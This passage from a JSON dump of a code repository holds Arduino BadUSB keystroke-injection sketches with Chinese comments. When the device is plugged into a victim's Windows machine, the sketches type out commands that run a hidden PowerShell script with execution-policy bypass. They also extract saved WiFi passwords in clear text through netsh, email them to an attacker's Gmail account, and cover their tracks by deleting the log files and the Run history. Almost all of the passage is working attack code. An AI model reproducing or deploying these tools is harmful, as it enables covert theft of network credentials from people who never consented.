CreateObject(\\\"WScript.Shell\\\") > %temp%\\\\dl.vbs\");\n  Keyboard.println(\"echo oShell.Run(\\\"powershell.exe -ep bypass -nologo -c %temp%\\\\dl.ps1\\\"),0,true >> %temp%\\\\dl.vbs\");\n  delay(1000);\n  Keyboard.println(\"wscript %temp%\\\\dl.vbs\");\n  delay(3000);\n  \n  Keyboard.println(\"exit\");\n\n  \n\n}\n\nvoid loop(){\n}\n\nDEFS\n\n\n\n\n"
  },
  {
    "path": "WiFi_PasswordAcquisition/WiFiPasswordCapture(tool).ino",
    "content": "/ /无线密码捕获工具\n//说明:将SSID、网络类型、鉴权、密码保存到Log.txt中，将Log.txt的内容通过email发送到gmail账户。\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);\n//Minimize all windows and open run cmd\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.press('d');\n  delay(200); \n  Keyboard.release('d');\n  delay(200); \n  Keyboard.print(\"r\");\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================cmd==========================\n  Keyboard.println(\"cmd\");\n  delay(1000);\n  //获取SSID信息\n  Keyboard.println(\"CD \\\"%userprofile%\\\\dEsktop\\\" & FOR /F \\\"TOKENS=2 DELIMS=: \\\" %A in ('NETSH WLAN SHOW INTERFACE ^| FINDSTR \\\"SSID\\\" ^| FINDSTR /V \\\"bssid\\\"') DO SET a=%a\");\n  //搜寻关键字符串，创建TXT文件\n  Keyboard.println(\"NETSH WLAH SHOW PROFILES %a% KEY=CLEAR | FINDSTR /C:\\\"nETWORK TYPE\\\" /C:\\\"aUTHENTICATION\\\" /C:\\\"kEY cONTENT\\\" | FINDSTR /V \\\"BROADCAST\\\" | FINDSTR /V \\\"rADIO\\\">>a.TXT\");\n  //获取网络类型\n  Keyboard.println(\"FOR /F \\\"TOKENS=3 DELIMS=: \\\" %a IN ('FINDSTR \\\"nETWORK TYPE\\\" a.TXT') DO SET b=%a\");\n  //获得认证\n  Keyboard.println(\"FOR /F \\\"TOKENS=2 DELIMS=: \\\" %a IN ('FINDSTR \\\"aUTHENTICATION\\\" a.TXT') DO SET c=%a\");\n  //获得密码\n  Keyboard.println(\"FOR /F \\\"TOKENS=3 DELIMS=: \\\" %a IN ('FINDSTR \\\"kEY cONTENT\\\" a.TXT') DO SET d=%a\");\n  //删除TXT文件\n  Keyboard.println(\"DEL a.TXT\");\n  //创建文件Log.txt\n  Keyboard.println(\"ECHO ssid: %a%>>lOG.TXT & ECHO nETWORK TYPE: %b%>>lOG.TXT & ECHO aUTHENTICATION: %c%>>lOG.TXT & ECHO pASSWORD: %d%>>lOG.TXT\");\n  //邮件发送Log.txt\n  Keyboard.println(\"POWERSHELL\");\n  Keyboard.println(\"$smtpiNFO = nEW-oBJECT nET.mAIL.sMTPcLIENT('SMTP.GMAIL.COM', 587)\");//国内推荐使用163，qq邮箱\n  Keyboard.println(\"$smtpiNFO.eNABLEsSL = $TRUE\");\n  Keyboard.println(\"$smtpiNFO.cREDENTIALS = nEW-oBJECT sYSTEM.nET.nETWORKcREDENTIAL('account@GMAIL.COM', 'password')\");//邮箱账号、密码\n  Keyboard.println(\"$rEPORTeMAIL = nEW-oBJECT sYSTEM.nET.mAIL.mAILmESSAGE\");\n  Keyboard.println(\"$rEPORTeMAIL.fROM = 'account@GMAIL.COM'\");\n  Keyboard.println(\"$rEPORTeMAIL.tO.aDD('receiver@GMAIL.COM')\");\n  Keyboard.println(\"$rEPORTeMAIL.sUBJECT = 'wIfI KET GRABBER'\");\n  Keyboard.println(\"$rEPORTeMAIL.bODY = (gET-cONTENT lOG.TXT | OUT-sTRING)\");\n  Keyboard.println(\"$smtpiNFO.sEND($rEPORTeMAIL)\");\n  Keyboard.println(\"EXIT\");\n  Keyboard.println(\"DEL lOG.TXT & EXIT\")//清除log.txt文件并退出\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "WiFi_PasswordAcquisition/WiFiPasswordExport(tool).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"CMD /C START /MIN REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN NETSH WLAN EXPORT PROFILE KEY=CLEAR FOLDER=C:\\\\\");  //WIFI密码导出到指定位置\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  }
]